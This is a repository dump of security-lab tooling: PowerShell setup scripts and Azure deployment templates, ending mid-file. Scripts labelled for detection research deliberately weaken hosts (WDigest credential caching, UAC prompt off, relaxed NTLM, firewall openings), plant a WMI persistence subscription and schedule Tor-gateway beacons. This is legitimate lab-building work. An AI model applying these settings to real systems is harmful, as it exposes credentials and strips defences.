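# Create new self-signed-certificate to be used by WinRM.
# The subject is the short computer name, so clients connecting by FQDN will hit a name
# mismatch unless they skip the CN check.
$Thumbprint = (New-SelfSignedCertificate -DnsName $env:COMPUTERNAME -CertStoreLocation Cert:\LocalMachine\My).Thumbprint
# Create WinRM HTTPS listener.
# Use the WS-Man cmdlet rather than composing a winrm.cmd command line for cmd.exe: no
# hashtable quoting is needed, and the old string carried a stray trailing space in Hostname.
New-WSManInstance -ResourceURI winrm/config/Listener -SelectorSet @{Address='*'; Transport='HTTPS'} -ValueSet @{Hostname=$env:COMPUTERNAME; CertificateThumbprint=$Thumbprint}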
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Create-TestScheduledTask.ps1:
--------------------------------------------------------------------------------
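# Author: Roberto Rodriguez @Cyb3rWard0g
# Description: A scheduled task that triggers every 10 minutes and sends a GET request to DuckDuckGo and KeyBase Tor services
# (through .onion web gateways) to generate network telemetry for MDE detection testing.

# $_ is escaped so it survives this double-quoted string and is evaluated inside the task's
# PowerShell process; unescaped it is expanded (to nothing) while this script runs, leaving
# "Invoke-WebRequest -Uri }" in the task and no request ever being sent.
$action = New-ScheduledTaskAction -Execute "$PSHome\powershell.exe" -Argument "@('3g2up14pq6kufc4m.onion.to','fncuwbiisyh6ak3i.onion.ws') | ForEach-Object { Invoke-WebRequest -Uri `$_ }"
# Starts now and repeats every 10 minutes for 20 years.
$trigger = New-ScheduledTaskTrigger `
    -Once `
    -At (Get-Date) `
    -RepetitionInterval (New-TimeSpan -Minutes 10) `
    -RepetitionDuration (New-TimeSpan -Days (365 * 20))
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "TestMDEWebRequest" -Description "Testing Web Requests to trigger MDE"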
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Disarm-Box.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Deliberately weakens a lab host: relaxes NTLM client settings, starts Remote Registry,
# disables the UAC consent prompt for administrators and re-enables WDigest credential
# caching. Intended for detection research only.

$ErrorActionPreference = "Stop"

# Registry configurations
# References:
# https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
# https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote-servers
# https://github.com/eladshamir/Internal-Monologue/blob/85134e4ebe5ea9e7f6b39d4b4ad467e40a0c9eca/InternalMonologue/InternalMonologue.cs

# CSV of NTLM-related values; see the references above for the meaning of each value.
$regConfig = @"
regKey,name,value,type
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa","LmCompatibilityLevel",2,"DWord"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0","NTLMMinClientSec",536870912,"DWord"
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0","RestrictSendingNTLMTraffic",0,"DWord"
"@

Write-host "Setting up Registry keys for additional settings.."
foreach ($setting in ($regConfig | ConvertFrom-Csv)) {
    if(!(Test-Path $setting.regKey)){
        Write-Host $setting.regKey " does not exist.."
        New-Item $setting.regKey -Force
    }
    Write-Host "Setting " $setting.regKey
    $propertyArgs = @{
        Path         = $setting.regKey
        Name         = $setting.name
        Value        = $setting.value
        PropertyType = $setting.type
        Force        = $true
    }
    New-ItemProperty @propertyArgs
}

# Enable Remote Registry Service
$ServiceName = 'remoteregistry'
$arrService = Get-Service -Name $ServiceName

if ($arrService.Status -ne 'Running')
{
    Write-host 'Enabling Remote Registry..'
    & sc.exe start remoteregistry
    write-Host "Setting Remote Registry to start automatically.."
    & sc.exe config remoteregistry start= auto
}
else
{
    Write-Host "$ServiceName Service is now Running"
}

# Setting UAC level to Never Notify (ConsentPromptBehaviorAdmin = 0: elevate without prompting)
Write-Host "Setting UAC level to Never Notify.."
$uacArgs = @{
    Path  = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System"
    Name  = "ConsentPromptBehaviorAdmin"
    Value = 0
    Force = $true
}
Set-ItemProperty @uacArgs

# *** Registry modified to allow storage of wdigest credentials ***
Write-Host "Setting WDigest to use logoncredential.."
$wdigestArgs = @{
    Path  = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
    Name  = "UseLogonCredential"
    Value = "1"
    Force = $true
}
Set-ItemProperty @wdigestArgs
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Disarm-Firewall.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Opens the Windows Firewall for ICMPv4, WMI, DCOM/RPC (dllhost), Explorer (ShellWindows)
# and SMB so lab tooling can reach this host. Every change is made through netsh.

$ErrorActionPreference = "Stop"

$system32 = "$Env:WinDir\system32"

# Firewall Changes
Write-Host "Allow ICMP Traffic through firewall"
& netsh advfirewall firewall add rule name="ALL ICMP V4" protocol=icmpv4:any,any dir=in action=allow

Write-Host "Enable WMI traffic through firewall"
& netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

Write-Host "Enable Inbound RPC Dynamic Ports"
# Reference:
# https://serverfault.com/questions/430705/how-do-i-allow-remote-iisreset-through-the-firewall-on-win-server-2008
# https://stackoverflow.com/questions/21092050/comexception-when-trying-to-get-application-pools-using-servermanager
# Local port: Dynamic RPC
# Remote port: ALL
# Protocol number: 6
# Executable: %windir%\\system32\\dllhost.exe
# Remote privilege: Administrator
& netsh advfirewall firewall add rule name="COM+ Remote Administration (All Programs)" dir=in action=allow description="" program="$system32\dllhost.exe" enable=yes localport=RPC protocol=tcp

Write-Host "Enable Explorer.exe Inbound (i.e. COM Method ShellWindows)"
# Same rule for both transports, limited to the local subnet.
foreach ($proto in 'udp', 'tcp') {
    $ruleName = "Windows Explorer $($proto.ToUpper())"
    & netsh advfirewall firewall add rule name="$ruleName" dir=in action=allow description="" program="$Env:WinDir\explorer.exe" enable=yes localport=any protocol=$proto remoteip=localsubnet
}

## Configured firewall to allow SMB
Write-Host "Enable File and Printer Sharing"
& netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Invoke-WMISubscription.ps1:
--------------------------------------------------------------------------------
# ##########################################
# Permanent WMI Subscription #
# Consumer Class: CommandLineEventConsumer #
############################################

# Lab sample of a permanent WMI event subscription: when notepad.exe starts, the
# consumer appends a line to C:\ProgramData\WMIEventing.txt. The three objects created
# in root\subscription (filter, consumer, binding) are the artefacts defenders look
# for, e.g. Sysmon event IDs 19/20/21 and the WMI-Activity operational log when enabled.

$filterProperties = @{
    EventNamespace = 'root/cimv2'
    Name = 'NotepadProcessStarted1'
    Query = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"
    QueryLanguage = 'WQL'
}

$wmiFilter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Property $filterProperties

$consumerProperties = @{
    Name = 'CLConsumer'
    CommandLineTemplate = "powershell.exe -c Add-Content -Value 'CommandLineEventConsumer' -Path C:\ProgramData\WMIEventing.txt"
}

$wmiConsumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Property $consumerProperties

# The binding ties the filter's events to the consumer.
$bindingProperties = @{
    Filter = $wmiFilter
    Consumer = $wmiConsumer
}

$wmiBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Property $bindingProperties

# Cleanup
#$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'CLConsumer'"
#$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'NotepadProcessStarted1'"
#$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
#$FilterConsumerBindingToCleanup | Remove-WmiObject
#$EventConsumerToCleanup | Remove-WmiObject
#$EventFilterToCleanup | Remove-WmiObject
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Register-PADMachine.ps1:
--------------------------------------------------------------------------------
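# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://learn.microsoft.com/en-us/power-automate/desktop-flows/machines-silent-registration
# https://github.com/Azure/azure-powershell/blob/main/src/Alb/utils/Unprotect-SecureString.ps1

# Registers this machine with the Power Automate platform using an application
# (service principal) client secret, piped to the registration tool on stdin.
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [System.Security.SecureString]$clientSecret,

    [Parameter(Mandatory=$true)]
    [String]$appClientId,

    [Parameter(Mandatory=$true)]
    [String]$tenantId,

    [Parameter(Mandatory=$true)]
    [String]$environmentId
)

# The registration tool reads the secret from stdin when -clientsecret is passed with no
# value (first reference), so the SecureString is decoded only for the duration of the
# pipe and the BSTR is zeroed in finally.
$ssPtr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($clientSecret)
$padExe = "C:\Program Files (x86)\Power Automate Desktop\PAD.MachineRegistration.Silent.exe"

try {
    Write-Host "[*] Registering $env:COMPUTERNAME to Power Automate platform .."
    # The static call is parenthesised so it is evaluated; as a bare argument PowerShell does
    # not invoke it, and the tool received something other than the secret on stdin.
    Write-Output ([System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($ssPtr)) | & $padExe -register -applicationid $appClientId -clientsecret -tenantid $tenantId -environmentid $environmentId
    # Native commands do not throw on failure; surface a non-zero exit explicitly.
    if ($LASTEXITCODE -ne 0) {
        Write-Warning "Failed registering to Power Platform, exit code: $LASTEXITCODE"
    }
}
catch {
    Write-Warning "Failed registering to Power Platform Error: $_"
}
finally {
    [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ssPtr)
}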
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Rename-Computer.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:

# Renames the local computer to $NewComputerName; -reboot restarts it immediately.
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [string]$NewComputerName,

    [Parameter(Mandatory=$false)]
    [switch]$reboot
)
write-host "Renaming computer to $NewComputerName .."
$renameArgs = @{
    NewName = $NewComputerName
    Force   = $true
}
# Only ask for a restart when the caller passed -reboot.
if($reboot)
{
    $renameArgs['Restart'] = $true
}
Rename-Computer @renameArgs
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Set-ProxyServer.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Sets or clears the WinINET proxy for the current user (HKCU, so it only affects
# the account running this script). ProxyEnable 1 = use $ProxyServer, 0 = clear it.
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [String]$ProxyServer,

    [Parameter(Mandatory=$false)]
    [ValidateSetAttribute(1,0)]
    [Int]$ProxyEnable = 1
)

$internetSettings = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings'

if ($ProxyEnable -eq 1){
    $serverValue = "$ProxyServer"
    $enableValue = 1
}
else {
    $serverValue = ""
    $enableValue = 0
}

Set-ItemProperty -Path $internetSettings -name ProxyServer -Value $serverValue
Set-ItemProperty -Path $internetSettings -name ProxyEnable -Value $enableValue
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Set-StaticIP.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:
# https://aws.amazon.com/blogs/compute/optimizing-joining-windows-server-instances-to-a-domain-with-powershell-in-aws-cloudformation/

# Converts the current (DHCP-assigned) IPv4 address, prefix and gateway into a static
# configuration, optionally overriding the DNS servers.
[CmdletBinding()]
param (
    [Parameter(Mandatory=$false)]
    [string]$ServerAddresses
)

$ErrorActionPreference = "Stop"

# Snapshot the current configuration before DHCP is turned off.
# NOTE(review): assumes a single adapter / single IPv4 address — with several, these values are arrays.
$netip          = Get-NetIPConfiguration
$currentAddress = $netip.IPv4Address.IpAddress
$ipconfig       = Get-NetIPAddress | Where-Object { $_.IpAddress -eq $currentAddress }

$adapters = Get-NetAdapter
$adapters | Set-NetIPInterface -DHCP Disabled
$adapters | New-NetIPAddress -AddressFamily IPv4 -IPAddress $currentAddress -PrefixLength $ipconfig.PrefixLength -DefaultGateway $netip.IPv4DefaultGateway.NextHop

# DNS: explicit servers when given, otherwise keep what DHCP handed out.
if($ServerAddresses)
{
    $dnsServers = $ServerAddresses
}
else{
    $dnsServers = $netip.DNSServer.ServerAddresses
}
$adapters | Set-DnsClientServerAddress -ServerAddresses $dnsServers
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Set-WallPaper.ps1:
--------------------------------------------------------------------------------
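# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Downloads BgInfo, the OTR wallpaper and its BgInfo config, then registers BgInfo
# under the machine Run key so every logon applies the wallpaper.

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

# DNS sanity checks; their output stays in the transcript to help troubleshoot failed downloads.
Resolve-DnsName github.com
Resolve-DnsName raw.githubusercontent.com
Resolve-DnsName live.sysinternals.com

$wc = new-object System.Net.WebClient
# Download BgInfo over HTTPS. The previous version fetched this executable over plain HTTP
# and then registered it to run at every logon, which would let an on-path party swap the binary.
$wc.DownloadFile('https://live.sysinternals.com/bginfo.exe', 'C:\ProgramData\bginfo.exe')
if (!(Test-Path 'C:\ProgramData\bginfo.exe')) { Write-Error "bginfo.exe was not downloaded" -ErrorAction Stop }

# Copy Wallpaper
$wc.DownloadFile('https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/configs/bginfo/otr.jpg', 'C:\ProgramData\otr.jpg')

# Copy BGInfo config
$wc.DownloadFile('https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/configs/bginfo/OTRWallPaper.bgi', 'C:\ProgramData\OTRWallPaper.bgi')

# Set Run Key: BgInfo applies the .bgi config silently at each interactive logon.
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "BgInfo" -Value "C:\ProgramData\bginfo.exe C:\ProgramData\OTRWallPaper.bgi /silent /timer:0 /nolicprompt" -PropertyType "String" -force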
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Update-LocalAdminPWD.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:

# Sets the password of the local Administrator account via ADSI (WinNT provider).
# NOTE(review): the password is taken as a plain [String]; anything that records command
# lines or script blocks (transcripts, deployment extensions) will capture it. The type is
# kept because existing callers pass a string.
[CmdletBinding()]
param (
    [Parameter(Mandatory=$true)]
    [String]$LocalAdminPassword
)

Write-Host "Updating Local Administrator Password.."
$adminAccount = [adsi]"WinNT://$env:computername/Administrator"
$adminAccount.SetPassword($LocalAdminPassword)
--------------------------------------------------------------------------------
/resources/scripts/powershell/misc/Update-RemoteTask.ps1:
--------------------------------------------------------------------------------
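# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# References:

# Rewrites the executable and/or arguments of an existing scheduled task on a remote
# computer through the Schedule.Service COM API and re-registers it as SYSTEM.
#
# Parameters:
#   ComputerName - host to connect to (Task Scheduler RPC).
#   FolderName   - task folder; defaults to the root folder "\".
#   TaskName     - name of the task inside that folder.
#   Executable   - new action Path; applied only when the parameter is supplied.
#   Arguments    - new action Arguments; applied only when the parameter is supplied.
function Update-RemoteTask {

    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)]
        [string]$ComputerName,

        [Parameter(Mandatory=$false)]
        [string]$FolderName = '\',

        [Parameter(Mandatory=$false)]
        [string]$TaskName,

        [Parameter(Mandatory=$false)]
        [string]$Executable,

        [Parameter(Mandatory=$false)]
        [string]$Arguments
    )

    # connect to Task Scheduler:
    $service = New-Object -ComObject Schedule.Service
    $service.Connect($ComputerName)

    # Get task folder that contains tasks:
    $folder = $service.GetFolder($FolderName)

    # Enumerate Specific Task
    $task = $folder.GetTask($TaskName)

    # get task definition and change it (i.e Arguments)
    # Only touch the fields the caller supplied: previously an omitted -Executable
    # overwrote every action's Path with an empty string (same for -Arguments).
    $setPath      = $PSBoundParameters.ContainsKey('Executable')
    $setArguments = $PSBoundParameters.ContainsKey('Arguments')
    $taskdefinition = $task.Definition
    $taskdefinition.Actions | ForEach-Object {
        if ($setPath)      { $_.Path = $Executable }
        if ($setArguments) { $_.Arguments = $Arguments }
    }

    # Flags:
    # 4 = UPDATE
    # 6 = CREATE_UPDATE
    #
    # LogonType:
    # 5 = Indicates that a Local System, Local Service, or Network Service account is being used as a security context to run the task.
    $folder.RegisterTaskDefinition($task.Name, $taskdefinition, 4, "System", $null, 5)
}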
--------------------------------------------------------------------------------
/templates/azure/Authorization-Role-Assignments/resourceScope.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "scopeResourceIDs": {
6 | "type": "array",
7 | "metadata": {
8 | "description": "List of resource IDs to use in the scope"
9 | }
10 | },
11 | "roleDefinitionId": {
12 | "type": "string",
13 | "metadata": {
14 | "description": "Id of the role definition"
15 | }
16 | },
17 | "principalType": {
18 | "type": "string",
19 | "defaultValue": "ServicePrincipal",
20 | "metadata": {
21 | "description": "The principal type of the assigned principal ID."
22 | },
23 | "allowedValues": [
24 | "Device",
25 | "ForeignGroup",
26 | "Group",
27 | "ServicePrincipal",
28 | "User"
29 | ]
30 | },
31 | "principalId": {
32 | "type": "string",
33 | "metadata": {
34 | "description": "The ID of the user, group, or application (service principal object ID) you want to assign the role to"
35 | }
36 | }
37 | },
38 | "variables": {},
39 | "resources": [
40 | {
41 | "type": "Microsoft.Authorization/roleAssignments",
42 | "apiVersion": "2020-10-01-preview",
43 | "name": "[guid(parameters('scopeResourceIDs')[copyIndex('rolesAssignmentCopy')])]",
44 | "scope": "[parameters('scopeResourceIDs')[copyIndex('rolesAssignmentCopy')]]",
45 | "copy": {
46 | "name": "rolesAssignmentCopy",
47 | "count": "[length(parameters('scopeResourceIDs'))]"
48 | },
49 | "properties": {
50 | "roleDefinitionId": "[parameters('roleDefinitionId')]",
51 | "principalId": "[parameters('principalId')]",
52 | "principalType": "[parameters('principalType')]"
53 | }
54 | }
55 | ],
56 | "outputs": {}
57 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Automation-Account/AzureAutomationTutorialNew.ps1:
--------------------------------------------------------------------------------
<#
.DESCRIPTION
An example runbook which gets all the ARM resources using the Managed Identity

.NOTES
AUTHOR: Azure Automation Team
LASTEDIT: Oct 26, 2021
#>

# A bare string is written to the output stream, so it shows up in the job output.
"Please enable appropriate RBAC permissions to the system identity of this automation account. Otherwise, the runbook may fail..."

# Sign in with the automation account's system-assigned managed identity. A failure is
# written as an error and re-thrown so the runbook stops instead of continuing unauthenticated.
try {
    "Logging in to Azure..."
    Connect-AzAccount -Identity
}
catch {
    Write-Error -Message $_.Exception
    throw $_.Exception
}

# Walk every resource group the identity can read and list the resources inside each one.
foreach ($ResourceGroup in (Get-AzResourceGroup)) {
    $groupName = $ResourceGroup.ResourceGroupName
    Write-Output ("Showing resources in resource group " + $groupName)
    Get-AzResource -ResourceGroupName $groupName | ForEach-Object {
        Write-Output ($_.Name + " of type " + $_.ResourceType)
    }
    Write-Output ("")
}
--------------------------------------------------------------------------------
/templates/azure/Azure-Automation-Account/azuredeploy.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
3 | "contentVersion": "2.0.0.0",
4 | "parameters": {
5 | "accountName": {
6 | "type": "String",
7 | "metadata": {
8 | "description": "Name of the automation account"
9 | }
10 | },
11 | "location": {
12 | "defaultValue": "[resourceGroup().location]",
13 | "type": "String",
14 | "metadata": {
15 | "description": "Location for automation account"
16 | }
17 | }
18 | },
19 | "variables": {
20 | "artifactsBlacksmith": "https://raw.githubusercontent.com/OTRF/Blacksmith/master/"
21 | },
22 | "resources": [
23 | {
24 | "type": "Microsoft.Automation/automationAccounts",
25 | "apiVersion": "2021-06-22",
26 | "name": "[parameters('accountName')]",
27 | "location": "[parameters('location')]",
28 | "dependsOn": [],
29 | "tags": {},
30 | "identity": {
31 | "type": "SystemAssigned"
32 | },
33 | "properties": {
34 | "sku": {
35 | "name": "Basic"
36 | },
37 | "publicNetworkAccess": true
38 | },
39 | "resources": [
40 | {
41 | "type": "runbooks",
42 | "apiVersion": "2019-06-01",
43 | "name": "AzureAutomationTutorialWithIdentity",
44 | "location": "[parameters('location')]",
45 | "dependsOn": [
46 | "[concat('Microsoft.Automation/automationAccounts/', parameters('accountName'))]"
47 | ],
48 | "tags": {},
49 | "properties": {
50 | "runbookType": "PowerShell",
51 | "logProgress": false,
52 | "logVerbose": false,
53 | "description": "An example runbook which gets all the ARM resources using the Managed Identity.",
54 | "publishContentLink": {
55 | "uri": "[uri(variables('artifactsBlacksmith'), 'templates/azure/Azure-Automation-Account/AzureAutomationTutorialNew.ps1')]",
56 | "version": "1.0.0.0"
57 | }
58 | }
59 | }
60 | ]
61 | }
62 | ]
63 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-Bastion-Host/README.md:
--------------------------------------------------------------------------------
1 | # Azure Bastion Host
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Bastion-Host%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-Bastion-Host%2Fazuredeploy.json)
6 |
7 | ## References
8 | * https://docs.microsoft.com/en-us/azure/bastion/bastion-overview
9 | * https://azure.microsoft.com/en-us/pricing/details/azure-bastion/
--------------------------------------------------------------------------------
/templates/azure/Azure-CosmosDB-Graph/README.md:
--------------------------------------------------------------------------------
1 | # CosmosDB Graph
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FCosmosDB-Graph%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Azure-EventHub/README.md:
--------------------------------------------------------------------------------
1 | # Linux Virtual Machine
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FEventHub%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FEventHub%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Azure-EventHub/azuredeploy.parameters.json:
--------------------------------------------------------------------------------
1 | {
2 | "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
3 | "contentVersion": "1.0.0.0",
4 | "parameters": {
5 | "projectName": {
6 | "value": "MordorData"
7 | },
8 | "eventHubSku": {
9 | "value": "Standard"
10 | }
11 | }
12 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-EventHub/main.bicep:
--------------------------------------------------------------------------------
// Event Hub namespace plus one event hub. The namespace's root SAS policy is resolved
// below so that its keys can be returned as template outputs.
// NOTE(review): this is the older `param name type { metadata / default / allowed }` form
// rather than @metadata()/@allowed() decorators - confirm the Bicep CLI in use still accepts it.
param utcValue string {
  metadata: {
    description: 'Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used'
  }
  default: utcNow()
}
param projectName string {
  metadata: {
    description: 'Specifies a project name that is used to generate the Event Hub name and the Namespace name.'
  }
}
param location string {
  metadata: {
    description: 'Specifies the Azure location for all resources.'
  }
  default: resourceGroup().location
}
param eventHubSku string {
  allowed: [
    'Basic'
    'Standard'
  ]
  metadata: {
    description: 'Specifies the messaging tier for service Bus namespace.'
  }
  default: 'Standard'
}

// utcValue defaults to utcNow(), so the uniqueString suffix - and with it the namespace
// name - differs on every deployment: re-running the template creates a new namespace
// rather than updating the one from the previous run.
var uniqueNamespace = concat(projectName, uniqueString(resourceGroup().id, utcValue))
var eventHubName_var = 'evh-${projectName}'
var eventHubNamespaceName_var = 'evhns-${uniqueNamespace}'
// Built-in root policy of the namespace; its keys are read by the two secret outputs below.
var defaultSASKeyName = 'RootManageSharedAccessKey'
var authRuleResourceId = resourceId('Microsoft.EventHub/namespaces/authorizationRules', eventHubNamespaceName_var, defaultSASKeyName)

resource eventHubNamespaceName 'Microsoft.EventHub/namespaces@2017-04-01' = {
  name: eventHubNamespaceName_var
  location: location
  sku: {
    name: eventHubSku
    tier: eventHubSku
    capacity: 1
  }
  properties: {
    // fixed at the single throughput unit set by capacity above; no auto-inflate
    isAutoInflateEnabled: false
    maximumThroughputUnits: 0
  }
}

// Child hub named '<namespace>/evh-<projectName>'; referencing the namespace resource
// also makes the hub deploy after it.
resource eventHubNamespaceName_eventHubName 'Microsoft.EventHub/namespaces/eventhubs@2017-04-01' = {
  name: '${eventHubNamespaceName.name}/${eventHubName_var}'
  properties: {
    messageRetentionInDays: 7
    partitionCount: 1
  }
}

output EventHubName string = eventHubName_var
output EventHubNamespace string = eventHubNamespaceName_var
// SECURITY: the two outputs below return the RootManageSharedAccessKey connection string and
// primary key as plain string outputs. Deployment outputs are persisted in the resource
// group's deployment history and are readable by anyone with read access to deployments, so
// these keys should be considered exposed once the template has run. Prefer reading them at
// use time (listKeys in the consuming template or pipeline) or writing them to a Key Vault
// secret instead, and rotate the policy key if the deployment history has been shared.
output NamespaceConnectionString string = listkeys(authRuleResourceId, '2017-04-01').primaryConnectionString
output SharedAccessPolicyPrimaryKey string = listkeys(authRuleResourceId, '2017-04-01').primaryKey
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/README.md:
--------------------------------------------------------------------------------
1 | # Azure Function Application - PowerShell
2 |
3 | [](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-FunctionApp-Win-Pwsh%2Fazuredeploy.json) [](http://armviz.io/#/?load=https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-FunctionApp-Win-Pwsh%2Fazuredeploy.json)
4 |
5 | [](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FBlacksmith%2Fmaster%2Ftemplates%2Fazure%2FAzure-FunctionApp-Win-Pwsh%2Fazuredeploy.json)
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp.zip
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.funcignore:
--------------------------------------------------------------------------------
1 | .git*
2 | .vscode
3 | local.settings.json
4 | test
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Azure Functions artifacts
3 | bin
4 | obj
5 | appsettings.json
6 | local.settings.json
7 |
8 | # Azurite artifacts
9 | __blobstorage__
10 | __queuestorage__
11 | __azurite_db*__.json
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/extensions.json:
--------------------------------------------------------------------------------
1 | {
2 | "recommendations": [
3 | "ms-azuretools.vscode-azurefunctions",
4 | "ms-vscode.PowerShell"
5 | ]
6 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/launch.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "0.2.0",
3 | "configurations": [
4 | {
5 | "name": "Attach to PowerShell Functions",
6 | "type": "PowerShell",
7 | "request": "attach",
8 | "customPipeName": "AzureFunctionsPSWorker",
9 | "runspaceId": 1,
10 | "preLaunchTask": "func: host start"
11 | }
12 | ]
13 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/settings.json:
--------------------------------------------------------------------------------
1 | {
2 | "azureFunctions.deploySubpath": ".",
3 | "azureFunctions.projectLanguage": "PowerShell",
4 | "azureFunctions.projectRuntime": "~3",
5 | "debug.internalConsoleOptions": "neverOpen"
6 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/.vscode/tasks.json:
--------------------------------------------------------------------------------
1 | {
2 | "version": "2.0.0",
3 | "tasks": [
4 | {
5 | "type": "func",
6 | "label": "func: host start",
7 | "command": "host start",
8 | "problemMatcher": "$func-powershell-watch",
9 | "isBackground": true
10 | }
11 | ]
12 | }
--------------------------------------------------------------------------------
/templates/azure/Azure-FunctionApp-Win-Pwsh/funcApp/Hello/function.json:
--------------------------------------------------------------------------------
1 | {
2 | "bindings": [
3 | {
4 | "authLevel": "function",
5 | "type": "httpTrigger",
6 | "direction": "in",
7 | "name": "Request",
8 | "methods": [
9 | "get",
10 | "post"
11 | ]
12 | },
